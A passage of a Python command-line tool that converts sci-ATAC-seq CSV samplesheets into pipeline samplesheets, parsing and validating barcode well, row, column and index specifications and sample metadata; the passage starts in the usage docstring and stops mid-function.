1:96,P1-A07:P1-H07,\"E,F,G\",\"1,2,3\",sample.7,mouse,group_1,,Smith\n 1:96,P1-A08:P1-H08,\"E,F,G\",\"1,2,3\",sample.8,mouse,group_1,,Smith\n 1:96,P1-A09:P1-H09,\"E,F,G\",\"1,2,3\",sample.9,mouse,group_1,,Smith\n 1:96,P1-A10:P1-A10,\"E,F,G\",\"1,2,3\",sample.10,human,group_2,,Jones\n 1:96,P1-A11:P1-H11,\"E,F,G\",\"1,2,3\",sample.11,human,group_2,,Jones\n 1:96,P1-A12:P1-H12,\"E,F,G\",\"1,2,3\",sample.12,barnyard,group_3,,\n \n Notes:\n o the p7_row and p5_column value sets are enclosed in quotes\n in this example because the sets have commas. Do not use\n quotes in the spreadsheet program cells; the spreadsheet\n program adds them when it writes the CSV file.\n\nCommand line options:\n\n Option Description\n ------ -----------\n --use_all_barcodes By default, the BBI sci-ATAC processing pipeline uses only\n informative barcodes to assign reads to samples. In this\n description, a barcode is one of the four sequences N5, N7,\n P5, P7 (for ligation and PCR reactions). These four\n barcodes identify the read. If a barcode uses the same\n index set for all samples, it is considered to be\n uninformative for the purpose of identifying the sample,\n so it is not used to identify the sample. In the example\n samplesheet above, the N7, P5, and P7 index sets are the\n same for all samples so only the N5 indexes are used to\n identify samples. This is safe unless the sequencing run\n includes samples that are not present in the samplesheet\n and those additional samples are distinguished by barcode\n index sets that appear to be uninformative based on the\n samplesheet information. Use this option when there are\n such additional samples in the sequencing run.\n\nNotes:\n o the command line arguments -r, -l, -w, -t, -s, and --use_all_barcodes\n are used only with the JSON samplesheet format.\n\n\nFor help with command line parameters, run\n\nsciatac_samplesheet.py -h\n\nwhich gives\n\nusage: sciatac_samplesheet.py [-h] [-i INPUT] [-o OUTPUT] [-f {json,index}]\n [-r RUN_DIR] [-l {2,3}] [-w {96,384}] [-t]\n [-s {n5,n7}] [--use_all_barcodes] [-e] [-d] [-v]\n\nA program to convert sci-ATAC CSV samplesheet to pipeline samplesheet.\n\noptional arguments:\n -h, --help show this help message and exit\n -i INPUT, --input INPUT\n Input CSV samplesheet filename (required string).\n -o OUTPUT, --output OUTPUT\n Output samplesheet filename (required string).\n -f {json,index}, --format {json,index}\n Output file format (default: 'json') (optional\n string).\n -r RUN_DIR, --run_dir RUN_DIR\n Illumina run directory path (optional string).\n -l {2,3}, --level {2,3}\n Two or three level sci-ATAC-seq experiment (default:\n 3) (optional integer).\n -w {96,384}, --number_wells {96,384}\n Number of barcode set wells (default: 384) (optional\n integer).\n -t, --tn5_barcodes Tn5 has barcodes (optional flag).\n -s {n5,n7}, --sample_identifier {n5,n7}\n Ligation barcode that identifies the sample (default:\n 'n5') used to check for duplicates (optional string).\n --use_all_barcodes Use all barcodes to demultiplex fastq files. By\n default, uninformative barcodes are not used to\n identify samples when demultiplexing fastq files\n (optional flag).\n -e, --template Write template samplesheet file\n ('samplesheet.template.csv') with standard column\n formats and exit (optional flag).\n -d, --documentation Display documentation and exit (optional flag).\n -v, --version Give program and JSON output file versions and exit\n (optional flag).\n\"\"\"\n\n\nimport sys\nimport re\nimport csv\nimport json\nimport argparse\n\n#\n# Samplesheet JSON file version.\n#\nprogram_version = '4.1.1'\njson_file_version = '3.1.1'\n\n#\n# List of recognizable genome names.\n# This program issues a warning if a samplesheet genome is\n# not in this list.\n#\ngenome_name_list = [\n 'arabidopsis',\n 'barnyard',\n 'bat',\n 'cat',\n 'chicken',\n 'corn',\n 'cow',\n 'cynomolgus',\n 'dog',\n 'drosophila',\n 'duck',\n 'elephant',\n 'horse',\n 'human',\n 'macaque',\n 'mouse',\n 'opossum',\n 'pig',\n 'rabbit',\n 'rat',\n 'snake',\n 'worm',\n 'zebrafish',\n 'hg19',\n 'mm19',\n 'hg19_mm9'\n]\n\n\n#\n# List of recognizable CSV column header names.\n# These are used to check labels in the file.\n# The n5, n7, p5, and p7 names are assigned to\n# individual strings for error reporting.\n#\nn5_column_names = 'n5_wells n5_indexes'\nn7_column_names = 'n7_wells n7_indexes'\np5_column_names = 'p5_wells p5_indexes p5_columns'\np7_column_names = 'p7_wells p7_indexes p7_rows'\n\ncolumn_header_name_list = [ 'sample_name', 'genome', 'peak_group', 'peak_file', 'wrap_group' ]\ncolumn_header_name_list.extend( n5_column_names.split() )\ncolumn_header_name_list.extend( n7_column_names.split() )\ncolumn_header_name_list.extend( p5_column_names.split() )\ncolumn_header_name_list.extend( p7_column_names.split() )\n\ncolumns_required_list = [ 'n5', 'n7', 'p5', 'p7', 'sample_name', 'genome', 'peak_group', 'peak_file' ]\ncolumns_optional_list = [ 'wrap_group' ]\n\n#\n# Columns that may have empty cells. This is used to prevent\n# errors when testing for empty cells in check_rows().\n#\ncolumn_allow_empty_cell = [ 'peak_group', 'peak_file', 'wrap_group' ]\n\n\ndef display_documentation():\n print( __doc__ )\n return( 0 )\n\n\ndef check_args( args ):\n error_string = ''\n if( args.tn5_barcodes and ( args.number_wells == 384 or args.level == 3 ) ):\n error_string += ' tn5_barcodes requires level == 2 and number_wells == 96\\n'\n if( len( error_string ) > 0 ):\n print( 'Command line argument errors:' )\n print( error_string, file=sys.stderr )\n sys.exit( -1 )\n return( 0 )\n\n\ndef parse_header_column_name( string_in, column_name_list, error_string ):\n \"\"\"\n Split column header name into a 'type' and a 'format' and store as dictionary in column_name_list.\n \"\"\"\n if( not string_in.lower() in column_header_name_list ):\n error_string += ' %s' % ( string_in )\n return( column_name_list, error_string )\n string_in = string_in.lower()\n if( string_in == 'sample_name' ):\n column_name_dict = { 'type': 'sample_name', 'format': None }\n elif( string_in == 'genome' ):\n column_name_dict = { 'type': 'genome', 'format': None }\n elif( string_in == 'peak_group' ):\n column_name_dict = { 'type': 'peak_group', 'format': None }\n elif( string_in == 'peak_file' ):\n column_name_dict = { 'type': 'peak_file', 'format': None }\n elif( string_in == 'wrap_group' ):\n column_name_dict = { 'type': 'wrap_group', 'format': None }\n else:\n mobj = re.match( r'([np][57])_(wells|indexes|rows|columns)', string_in )\n column_name_dict = { 'type': mobj.group( 1 ), 'format': mobj.group( 2 ) }\n column_name_list.append( column_name_dict )\n return( column_name_list, error_string )\n\n\ndef check_header_column_names( column_name_list ):\n \"\"\"\n Check column header names.\n Notes:\n o check that required columns occur\n o check that each allowed column type occurs once\n o check that if either p5 or p7 are specified by columns and rows, then both are.\n \"\"\"\n columns_allowed = {}\n for column_name in columns_required_list:\n columns_allowed[column_name] = 0\n for column_name in columns_optional_list:\n columns_allowed[column_name] = 0\n for column_name_dict in column_name_list:\n columns_allowed[column_name_dict['type']] += 1\n error_flag = 0\n # Check for n5, n7, p5, and p7 specification columns.\n for column_name in columns_allowed:\n if( columns_allowed[column_name] == 0 and column_name not in columns_optional_list ):\n print( 'Error: column for \\'%s\\' missing.' % ( column_name ), file=sys.stderr )\n if( column_name == 'n5' ):\n print( ' acceptable n5 header values: %s' % ( n5_column_names ), file=sys.stderr )\n elif( column_name == 'n7' ):\n print( ' acceptable n7 header values: %s' % ( n7_column_names ), file=sys.stderr )\n elif( column_name == 'p5' ):\n print( ' acceptable p5 header values: %s' % ( p5_column_names ), file=sys.stderr )\n elif( column_name == 'p7' ):\n print( ' acceptable p7 header values: %s' % ( p7_column_names ), file=sys.stderr )\n error_flag = 1\n elif( columns_allowed[column_name] > 1 ):\n print( 'Error: column for \\'%s\\' occurs %d times.' % ( column_name, columns_allowed[column_name] ), file=sys.stderr )\n error_flag = 1\n if( error_flag ):\n sys.exit( -1 )\n p5_col = False\n p7_row = False\n for column_name_dict in column_name_list:\n if( column_name_dict['type'] == 'p5' and column_name_dict['format'] == 'columns' ):\n p5_col = True\n if( column_name_dict['type'] == 'p7' and column_name_dict['format'] == 'rows' ):\n p7_row = True\n if( p5_col != p7_row ):\n print( 'Error: p5 is %sin \\'columns\\' format but p7 is %sin \\'rows\\' format' % ( '' if p5_col else 'not ', '' if p7_row else 'not ' ), file=sys.stderr )\n sys.exit( -1 )\n return( 0 )\n\n\ndef parse_header( row_header ):\n \"\"\"\n Convert column header (row) into a list of column name dictionaries.\n The dictionary has the elements\n key value description\n type entry type name: n5, n7, p5, p7, sample_name, genome, peak_group, peak_file\n format barcode format values: wells, indexes, rows, columns, None (see column_header_name_list for allowed combinations of type and format)\n \"\"\"\n column_name_list = []\n error_string = ''\n for str in row_header:\n column_name_list, error_string = parse_header_column_name( str, column_name_list, error_string )\n if(len(error_string) > 0):\n print('Error: invalid header label(s): %s' % (error_string))\n sys.exit(-1)\n check_header_column_names( column_name_list )\n return( column_name_list )\n\n\ndef well_to_index( plate, row, column, across_row_first=True, element_coordinates=[None,None] ):\n \"\"\"\n Convert a well specification to a plate index in the range P1:A01=1 to P4:H12=384.\n\n Args:\n plate integer plate number between 1 and 4\n row character row (A-H)\n column integer column number (1-12)\n across_row_first bool index increases by one as a row is traversed; that is,\n moving from column to column along row\n Returns:\n index: an integer well index (1-384)\n\n \"\"\"\n row = row.lower()\n if( plate < 1 or plate > 4 or\n not row in [ 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h' ] or\n column < 1 or column > 12 ):\n print( 'Error: spreadsheet cell: %s%s: bad well values: plate: %d row: %s col: %d' % ( element_coordinates[0], element_coordinates[1], plate, row, column ), file=sys.stderr )\n sys.exit( -1 )\n irow = ord( row ) - ord( 'a' )\n icol = column - 1\n if( across_row_first ):\n well_index = irow * 12 + icol + 1\n else:\n well_index = icol * 8 + irow + 1\n return( well_index + ( plate - 1 ) * 96 )\n\n\ndef pad_well_col(well_col, zero_pad, id_length):\n if zero_pad:\n template = '%%0%sd' % id_length\n else:\n template = '%s'\n col_id = template % (well_col)\n return col_id\n\n\ndef index_to_well( well_index, across_row_first ):\n nrow = 8\n ncol = 12\n ipl = int( well_index / 96 )\n i96 = well_index - ipl * 96\n if across_row_first:\n well_row = chr(65 + int(i96 / ncol))\n well_col = (i96 % ncol) + 1\n else:\n well_row = chr(65 + (i96 % nrow))\n well_col = int(i96 / nrow) + 1\n\n# well_id = 'P%d-%s%s' % (ipl + 1, well_row, pad_well_col(well_col, zero_pad_col, id_length))\n well_id = '%s%s' % ( well_row, pad_well_col( well_col, True, 2 ) )\n\n return( well_id )\n\n\ndef check_index_list( index_list, element_coordinates = [ None, None ] ):\n \"\"\"\n Check and clean index list\n o check for duplicate indexes\n o remove duplicate indexes\n \"\"\"\n index_dict = {}\n for i in index_list:\n index_dict.setdefault( i, 0 )\n index_dict[i] += 1\n duplicate_list = []\n for i in index_dict.keys():\n if( index_dict[i] > 1 ):\n duplicate_list.append( str( i ) )\n if( len( duplicate_list ) > 0 ):\n print( 'Warning: spreadsheet cell: %s %s: duplicate well index(es): %s' % ( element_coordinates[0], element_coordinates[1], ' '.join( sorted(duplicate_list) ) ), file=sys.stderr )\n print( ' These indexes are duplicated within the reported spreadsheet cell, which may be intentional.')\n return( list( set( index_list ) ) )\n\n\ndef make_index_string( index_list ):\n \"\"\"\n Convert a list of (integer) barcode well indexes to an index string where\n o repeated indexes are dropped; that is, keep only distinct indexes\n o sequences of counting numbers are expressed as ranges, for example, 5 6 7 8 9 => 5-9\n o indexes and index ranges are separated by commas\n \"\"\"\n index_string = ''\n index_list.sort()\n index_prev = None\n index1 = None\n for i in index_list:\n if( index_prev ):\n if( i == index_prev ):\n continue\n elif( i > index_prev + 1 ):\n if( len( index_string ) > 0 ):\n index_string += ','\n if( index_prev > index1 ):\n index_string += '%d-%d' % ( index1, index_prev )\n else:\n index_string += '%d' % ( index_prev )\n index1 = i\n else:\n index1 = i\n index_prev = i\n # last index in list\n if( len( index_string ) > 0 ):\n index_string += ','\n if( index_prev > index1 ):\n index_string += '%d-%d' % ( index1, index_prev )\n else:\n index_string += '%d' % ( index_prev )\n return( index_string )\n\n\ndef parse_indexes( string_in, max_index = 96, element_coordinates = [ None, None ] ):\n \"\"\"\n Convert an index specification to an index string.\n Acceptable index specifications include\n o single integer index\n o 76\n o range of integer indexes, example\n o 5-9\n o single and/or ranges of indexes separated by commas, examples\n o 3,6\n o 3,5-9\n o 2-4,9-18\n o 2:4,9:18\n \"\"\"\n index_list = []\n string_in = re.sub( r'\\s', '', string_in )\n for index_range in string_in.split( ',' ):\n mobj = re.match( r'([0-9]+)([-:]([0-9]+))?$', index_range )\n if( not mobj ):\n print( 'Error: spreadsheet cell: %s%s: bad index range \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], index_range ), file=sys.stderr )\n sys.exit( -1 )\n index1 = int( mobj.group( 1 ) )\n if( index1 < 1 or index1 > max_index ):\n print( 'Error: spreadsheet cell: %s%s: bad index range \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], index_range ), file=sys.stderr )\n sys.exit( -1 )\n index2 = int( mobj.group( 3 ) ) if mobj.group( 2 ) else index1\n if( index2 < 1 or index2 > max_index ):\n print( 'Error: spreadsheet cell: %s%s: bad index range \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], index_range ), file=sys.stderr )\n sys.exit( -1 )\n if( index2 < index2 ):\n print( 'Error: spreadsheet cell: %s%s: bad index range \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], index_range ), file=sys.stderr )\n sys.exit( -1 )\n for i in range( index1, index2 + 1 ):\n index_list.append( i )\n return( check_index_list( index_list, element_coordinates ) )\n\n\ndef parse_wells( string_in, across_row_first=True, max_index = 96, element_coordinates = [ None, None ] ):\n \"\"\"\n Convert a well specification to an index string.\n Acceptable well specifications include\n o a single well without a plate specified (implicit plate=1), examples\n o A5\n o A05\n o a single well with a plate specified\n o P1-A5\n o P1:A5\n o the same well from all four plates\n o P*-A5\n o P*:A5\n o range of wells without plates specified,\n Note: the range of indices depends on whether the reaction type is n5/p5 or n7/p7.\n o A9-B9\n o A9:B9\n o range of wells with plates specified,\n o P1-A5:P1-A12\n o P1:A5-P1:A12\n o P1:A5:P1:A12\n o P1-A5-P1-A12\n o the same range of wells from all four plates\n o P*-A5:P*-A10\n o single and/or ranges of wells separated by commas\n o A10,P1-B5:P1-B10,C7\n \"\"\"\n index_list = []\n string_in = re.sub( r'\\s', '', string_in )\n for well_range in string_in.split( ',' ):\n expand_plate_flag = False\n# mobj = re.match( r'(P([1-4])-)?([A-H])([01]?[0-9])([-:](P([1-4])-)?([A-H])([01]?[0-9]))?$', well_range )\n mobj = re.match( r'([pP][0]?([1-4*])[-:])?([a-hA-H])([0]?[1-9][0-2]?)([-:]([pP][0]?([1-4*])[-:])?([a-hA-H])([0]?[1-9][0-2]?))?$', well_range )\n if( not mobj ):\n print( 'Error: spreadsheet cell: %s%s: bad well or well range \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], well_range ), file=sys.stderr )\n sys.exit( -1 )\n #\n # first well\n row1 = mobj.group( 3 )\n col1 = int( mobj.group( 4 ) )\n if( col1 < 1 or col1 > 12 ):\n print( 'Error: spreadsheet cell: %s%s: bad well: \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], string_in ), file=sys.stderr )\n sys.exit( -1 )\n # is plate specified?\n if( mobj.group( 1 ) ):\n if( mobj.group( 2 ) == '*' ):\n plate1_list = [ 1, 2, 3, 4 ]\n else:\n plate1_list = [ int( mobj.group( 2 ) ) ]\n else:\n plate1_list = [ 1 ]\n #\n if( mobj.group( 5 ) ):\n if( ( mobj.group( 2 ) == None ) != ( mobj.group( 7 ) == None ) ):\n print( 'Error: spreadsheet cell: %s%s: either both or neither well in a range must have plates specified: \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], string_in ), file=sys.stderr )\n sys.exit( -1 )\n if( ( mobj.group( 2 ) == '*' ) != ( mobj.group( 7 ) == '*' ) ):\n print( 'Error: spreadsheet cell: %s%s: either both or neither well in a range must have plates specified as \\'*\\': \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], string_in ), file=sys.stderr )\n sys.exit( -1 )\n\n # second well, if this is a range\n row2 = mobj.group( 8 )\n col2 = int( mobj.group( 9 ) )\n if( col2 < 1 or col2 > 12 ):\n print( 'Error: spreadsheet cell: %s%s: bad well: \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], string_in ), file=sys.stderr )\n sys.exit( -1 )\n # is plate specified?\n if( mobj.group( 6 ) ):\n if( mobj.group( 7 ) == '*' ):\n plate2_list = [ 1, 2, 3, 4 ]\n else:\n plate2_list = [ int( mobj.group( 7 ) ) ]\n else:\n plate2_list = [ 1 ]\n #\n else:\n plate2_list = plate1_list\n row2 = row1\n col2 = col1\n #\n for plate1, plate2 in zip( plate1_list, plate2_list ):\n index1 = well_to_index( plate1, row1, col1, across_row_first, element_coordinates )\n index2 = well_to_index( plate2, row2, col2, across_row_first, element_coordinates )\n if( index2 < index1 ):\n print( 'Error: spreadsheet cell: %s%s: bad well range: \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], string_in ), file=sys.stderr )\n sys.exit( -1 )\n for i in range( index1, index2 + 1 ):\n index_list.append( i )\n return( check_index_list( index_list, element_coordinates ) )\n\n\ndef parse_rows( string_in, element_coordinates = [ None, None ] ):\n \"\"\"\n Convert a row specification to an index string.\n Acceptable row specifications include\n o single row\n o B\n o row range\n o E-G\n o single and/or ranges of rows separated by commas\n o E-F,H\n \"\"\"\n index_list = []\n string_in = re.sub( r'\\s', '', string_in )\n for row_range in string_in.split( ',' ):\n mobj = re.match( r'([a-hA-H])([-:]([a-hA-H]))?$', row_range )\n if( not mobj ):\n print( 'Error: spreadsheet cell: %s%s: bad row or row range \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], row_range ), file=sys.stderr )\n sys.exit( -1 )\n row1 = mobj.group( 1 )\n row1_index = well_to_index( 1, row1, 1, True, element_coordinates )\n row2_index = row1_index\n if( mobj.group( 2 ) ):\n row2 = mobj.group( 3 )\n row2_index = well_to_index( 1, row2, 1, True, element_coordinates )\n if( row2_index < row1_index ):\n print( 'Error: spreadsheet cell: %s%s: bad row range: \\'%\\'' % ( element_coordinates[0], element_coordinates[1], string_in ), file=sys.stderr )\n sys.exit( -1 )\n index1 = row1_index\n index2 = row2_index + 11\n for i in range( index1, index2 + 1 ):\n index_list.append( i )\n return( check_index_list( index_list, element_coordinates ) )\n\n\ndef parse_columns( string_in, element_coordinates = [ None, None ] ):\n \"\"\"\n Convert a column specification to an index string.\n Acceptable column specifications include\n o single column\n o 5\n o column range\n o 6-8\n o single and/or ranges of column separated by commas\n o 9-11,3\n \"\"\"\n index_list = []\n string_in = re.sub( r'\\s', '', string_in )\n for col_range in string_in.split( ',' ):\n mobj = re.match( r'([1-9][0-2]?)([-:]([1-9][0-2]?))?$', col_range )\n if( not mobj ):\n print( 'Error: spreadsheet cell: %s%s: bad column or column range \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], col_range ), file=sys.stderr )\n sys.exit( -1 )\n\n col1 = int( mobj.group( 1 ) )\n col1_index = well_to_index( 1, 'A', col1, False, element_coordinates )\n col2_index = col1_index\n if( col1 < 1 or col1 > 12 ):\n print( 'Error: spreadsheet cell: %s%s: bad column value: \\'%d\\'' % ( element_coordinates[0], element_coordinates[1], col1 ), file=sys.stderr )\n sys.exit( -1 )\n if( mobj.group( 2 ) ):\n col2 = int( mobj.group( 3 ) )\n if( col2 < 1 or col2 > 12 ):\n print( 'Error: spreadsheet cell: %s%s: bad column value: \\'%d\\'' % ( element_coordinates[0], element_coordinates[1], col1 ), file=sys.stderr )\n sys.exit( -1 )\n if( col2 < col1 ):\n print( 'Error: spreadsheet cell: %s%s: bad column range: \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], string_in ), file=sys.stderr )\n sys.exit( -1 )\n col2_index = well_to_index( 1, 'A', col2, False, element_coordinates )\n index1 = col1_index\n index2 = col2_index + 7\n for i in range( index1, index2 + 1 ):\n index_list.append( i )\n return( check_index_list( index_list, element_coordinates ) )\n\n\ndef check_rows( column_name_list, csv_rows ):\n \"\"\"\n Trim off empty cells at end of rows and columns\n and check for internal empty cells. Allow empty\n internal row.\n Notes:\n o we expect\n o nrows \n \"\"\"\n # check for internal empty row\n csv_rows_out = []\n num_col = len( column_name_list )\n for irow, row_elements in enumerate( csv_rows ):\n num_empty = 0\n row_elements_out = []\n for icol, cell in enumerate( row_elements ):\n if( icol == num_col ):\n break\n if( len( cell ) > 0 or ( column_name_list[icol]['type'] in column_allow_empty_cell ) ):\n row_elements_out.append( cell )\n else:\n num_empty += 1\n if( num_empty == 0 ):\n csv_rows_out.append( row_elements_out )\n elif( num_empty > 0 and num_empty < num_col ):\n print( 'Error: row %d has empty cells' % ( irow + 1 ) )\n sys.exit( -1 )\n return( csv_rows_out )\n\n\ndef read_samplesheet( file ):\n \"\"\"\n Read CSV samplesheet input file.\n Notes:\n o the first row in the file must have column header names.\n o the column header names must be in the list 'column_header_name_list'.\n o the column order is arbitrary.\n \"\"\"\n samplesheet_row_list = []\n csv_rows = csv.reader( file, delimiter=',', quotechar='\"')\n csv_rows = list( csv_rows )\n row_header = csv_rows[0]\n column_name_list = parse_header( row_header )\n csv_rows = check_rows( column_name_list, csv_rows )\n for row_elements in csv_rows[1:]:\n samplesheet_row_list.append( row_elements )\n return( column_name_list, samplesheet_row_list )\n\n\ndef check_sample_names( column_name_list, samplesheet_row_list ):\n \"\"\"\n Check for name degeneracy.\n Check sample names for unacceptable characters and, if present, convert them to '.'.\n Sample names must begin with [a-zA-Z].\n Check that peak groups are positive integers.\n Unacceptable characters are characters that are not a-z, A-Z, 0-9, and '.'\n Check for name degeneracy after substitutions.\n Check that the barnyard sample is labeled 'Barnyard'.\n \"\"\"\n sample_name_in_dict = {}\n sample_name_out_dict = {}\n num_sample_name = 0\n for row_elements in samplesheet_row_list:\n for i in range( len( row_elements ) ):\n column_name_dict = column_name_list[i]\n element_string = row_elements[i]\n if( column_name_dict['type'] != 'sample_name' ):\n continue\n sample_name_in_dict.setdefault( element_string, 0 )\n sample_name_in_dict[element_string] += 1\n num_sample_name += 1\n mobj = re.match( r'[a-zA-Z]', element_string )\n if( not mobj ):\n print( 'Error: sample names must begin with an alphabetic character', file=sys.stderr )\n sys.exit( -1 )\n row_elements[i] = re.sub( r'[^a-zA-Z0-9.]', '.', element_string )\n sample_name_out_dict.setdefault( element_string, True )\n errorFlag = False\n for sample_name in sample_name_in_dict.keys():\n if( sample_name_in_dict[sample_name] > 1 ):\n print( 'Warning: sample name \\'%s\\' not unique. It is used %d times.' % ( sample_name, sample_name_in_dict[sample_name] ), file=sys.stderr )\n if( len( sample_name_out_dict ) != len( sample_name_in_dict ) ):\n print( 'Error: unacceptable names are not distinct after editing', file=sys.stderr )\n errorFlag = True\n if( errorFlag ):\n sys.exit( -1 )\n # Check barnyard sample name. (This is unnecessary, I believe.)\n# for row_elements in samplesheet_row_list:\n# for i in range( len( row_elements ) ):\n# column_name_dict = column_name_list[i]\n# element_string = row_elements[i]\n# if( column_name_dict['type'] != 'sample_name' ):\n# continue\n# mobj = re.search( r'barn', element_string.lower() )\n# if( mobj and element_string != 'Barnyard' ):\n# print( '**' )\n# print( '** Warning: barnyard sample name (%s) not \\'Barnyard\\'.' % ( element_string ), file=sys.stderr )\n# print( '** Consider re-naming it to \\'Barnyard\\' for compatibility' )\n# print( '** with the experiment dashboard.' )\n# print( '**' )\n# break\n return( samplesheet_row_list )\n\n\ndef check_genome_names( column_name_list, samplesheet_row_list ):\n \"\"\"\n Check genome names and warn if not in our list.\n \"\"\"\n missing_genome_names_dict = {}\n for row_elements in samplesheet_row_list:\n for i in range( len( row_elements ) ):\n column_name_dict = column_name_list[i]\n element_string = row_elements[i]\n if( column_name_dict['type'] != 'genome' ):\n continue\n if( not row_elements[i] in genome_name_list ):\n missing_genome_names_dict.setdefault( row_elements[i], True )\n if( len( missing_genome_names_dict.keys() ) > 0 ):\n print( 'The following genomes are not in my list of known genomes (they may be mis-spelled or not in my list).', file=sys.stderr )\n for missing_genome_name in missing_genome_names_dict.keys():\n print( ' \\'%s\\'' % ( missing_genome_name ), file=sys.stderr )\n return( 0 )\n\n\ndef check_peak_groups( column_name_list, samplesheet_row_list ):\n \"\"\"\n Check peak group names and exit on error.\n \"\"\"\n bad_peak_groups_dict = {}\n for row_elements in samplesheet_row_list:\n for i in range( len( row_elements ) ):\n column_name_dict = column_name_list[i]\n element_string = row_elements[i]\n if( column_name_dict['type'] != 'peak_group' ):\n continue\n if( len( element_string ) > 0 and re.search(r'[^a-zA-Z0-9_]', element_string ) ):\n bad_peak_groups_dict.setdefault( element_string, True )\n if( len( bad_peak_groups_dict.keys() ) > 0 ):\n print('Unacceptable peak group names (must use only alphabetic, positive integer, and underscore characters):')\n for bad_peak_group in bad_peak_groups_dict.keys():\n print( ' \\'%s\\'' % ( bad_peak_group ) )\n sys.exit( -1 )\n return( 0 )\n\n\ndef check_peak_files( column_name_list, samplesheet_row_list ):\n \"\"\"\n Check peak file names and exit on error.\n \"\"\"\n bad_peak_files_dict = {}\n for row_elements in samplesheet_row_list:\n for i in range( len( row_elements ) ):\n column_name_dict = column_name_list[i]\n element_string = row_elements[i]\n if( column_name_dict['type'] != 'peak_file' ):\n continue\n if( ( len( element_string ) > 0 ) and ( re.search(r'[\\0]+', element_string ) or re.match(r'[^/]', element_string ) ) ):\n bad_peak_files_dict.setdefault( element_string, True )\n if( len( bad_peak_files_dict.keys() ) > 0 ):\n print('Unacceptable peak file names (must start with \\'/\\' and must not contain null characters):')\n for bad_peak_file in bad_peak_files_dict.keys():\n print( ' \\'%s\\'' % ( bad_peak_file ) )\n sys.exit( -1 )\n return( 0 )\n\n\ndef check_peak_spec( column_name_list, samplesheet_row_list ):\n \"\"\"\n Check that each sample has a peak_group or a peak_file or both.\n \"\"\"\n bad_peak_dict = {}\n for row_elements in samplesheet_row_list:\n peak_group_flag = False\n peak_file_flag = False\n for i in range( len( row_elements ) ):\n column_name_dict = column_name_list[i]\n element_string = row_elements[i]\n if( column_name_dict['type'] == 'sample_name' ):\n sample_name = element_string\n if( column_name_dict['type'] == 'peak_group' and len( element_string ) > 0 ):\n peak_group_flag = True\n if( column_name_dict['type'] == 'peak_file' and len( element_string ) > 0 ):\n peak_file_flag = True\n if( ( not peak_group_flag ) and ( not peak_file_flag ) ):\n bad_peak_dict.setdefault( sample_name, True )\n if( len( bad_peak_dict.keys() ) > 0 ):\n print('Samples have no peak_group and no peak_file values:')\n for bad_peak_spec in bad_peak_dict.keys():\n print( ' \\'%s\\'' % ( bad_peak_spec ) )\n sys.exit( -1 )\n return( 0 )\n\n\ndef check_wrap_group( column_name_list, samplesheet_row_list ):\n \"\"\"\n Check that each sample has a wrap_group and that the values are valid.\n \"\"\"\n bad_wrap_group_dict = {}\n for row_elements in samplesheet_row_list:\n wrap_group_flag = False\n for i in range( len( row_elements ) ):\n column_name_dict = column_name_list[i]\n element_string = row_elements[i]\n if( column_name_dict['type'] != 'wrap_group' ):\n continue\n sample_name = element_string\n if( len( element_string ) > 0 and re.search(r'[^-_.a-zA-Z0-9]', element_string ) ):\n bad_wrap_group_dict.setdefault( element_string, True )\n\n if( len( bad_wrap_group_dict.keys() ) > 0 ):\n print('Samples have no wrap_group values or the values' )\n print('have unacceptable characters. Acceptable characters' )\n print('are alphabetic, positive integers, and \".\", \"_\", and \"-\".')\n for bad_wrap_group in bad_wrap_group_dict.keys():\n print( ' \\'%s\\'' % ( bad_wrap_group ) )\n sys.exit( -1 )\n return( 0 )\n\n\ndef expand_rows( string_in, element_coordinates = [ None, None ] ):\n \"\"\"\n Expand a P7 row specification to a list of rows.\n Acceptable row specifications include\n o single row\n o B\n o row range\n o E-G\n o single and/or ranges of rows separated by commas\n o E-F,H\n \"\"\"\n string_in = re.sub( r'\\s', '', string_in )\n row_list = []\n for row_range in string_in.split( ',' ):\n mobj = re.match( r'([a-hA-H])([-:]([a-hA-H]))?$', row_range )\n if( not mobj ):\n print( 'Error: spreadsheet cell: %s%s: bad row or row range \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], row_range ), file=sys.stderr )\n sys.exit( -1 )\n icode_row1 = ord(mobj.group( 1 ))\n icode_row2 = icode_row1\n if( mobj.group( 2 ) ):\n icode_row2 = ord(mobj.group( 3 ))\n if( icode_row2 < icode_row1 ):\n print( 'Error: spreadsheet cell: %s%s: bad row range: \\'%\\'' % ( element_coordinates[0], element_coordinates[1], string_in ), file=sys.stderr )\n sys.exit( -1 )\n for icode in range(icode_row1, icode_row2+1):\n row_list.append(chr(icode))\n return(row_list)\n\n\ndef expand_columns( string_in, element_coordinates = [ None, None ] ):\n \"\"\"\n Expand a P5 column specification to a list of columns.\n Acceptable column specifications include\n o single column\n o 5\n o column range\n o 6-8\n o single and/or ranges of column separated by commas\n o 9-11,3\n \"\"\"\n string_in = re.sub( r'\\s', '', string_in )\n column_list = []\n for col_range in string_in.split( ',' ):\n mobj = re.match( r'([1-9][0-2]?)([-:]([1-9][0-2]?))?$', col_range )\n if( not mobj ):\n print( 'Error: spreadsheet cell: %s%s: bad column or column range \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], col_range ), file=sys.stderr )\n sys.exit( -1 )\n\n icol_col1 = int( mobj.group( 1 ) )\n icol_col2 = icol_col1\n if( icol_col1 < 1 or icol_col1 > 12 ):\n print( 'Error: spreadsheet cell: %s%s: bad column value: \\'%d\\'' % ( element_coordinates[0], element_coordinates[1], col1 ), file=sys.stderr )\n sys.exit( -1 )\n if( mobj.group( 2 ) ):\n icol_col2 = int( mobj.group( 3 ) )\n if( icol_col2 < 1 or icol_col2 > 12 ):\n print( 'Error: spreadsheet cell: %s%s: bad column value: \\'%d\\'' % ( element_coordinates[0], element_coordinates[1], col1 ), file=sys.stderr )\n sys.exit( -1 )\n if( icol_col2 < icol_col1 ):\n print( 'Error: spreadsheet cell: %s%s: bad column range: \\'%s\\'' % ( element_coordinates[0], element_coordinates[1], string_in ), file=sys.stderr )\n sys.exit( 